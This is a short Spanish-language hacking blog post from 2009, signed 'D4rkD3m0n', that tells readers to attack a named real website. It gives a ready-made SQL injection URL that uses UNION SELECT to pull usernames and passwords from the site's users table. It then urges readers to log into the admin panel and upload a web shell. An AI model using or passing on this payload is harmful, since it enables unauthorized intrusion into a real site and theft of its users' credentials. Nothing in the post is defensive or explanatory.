lunes, 2 de noviembre de 2009

SQL INJECTION a www.fovimar.com

Bueno si siguieron los pasos a la injection anterior podran hacerlo en www.fovimar.com ya que esta tambien cuenta con la misma vulnerabilidad manos a la obra y a practicar!!!

Aqui esta la ayuda si lo hicieron bien les quedara algo asi:

http://www.fovimar.com/detalleNoticia.php?id=-1+union+select+0,
usu_usuario,2,usu_contrasena,4,5,6,7,8,9+from+usuarios

Ahora entren al panel y logearse!! subir shell :)!!

by D4rkD3m0n

No hay comentarios:

Publicar un comentario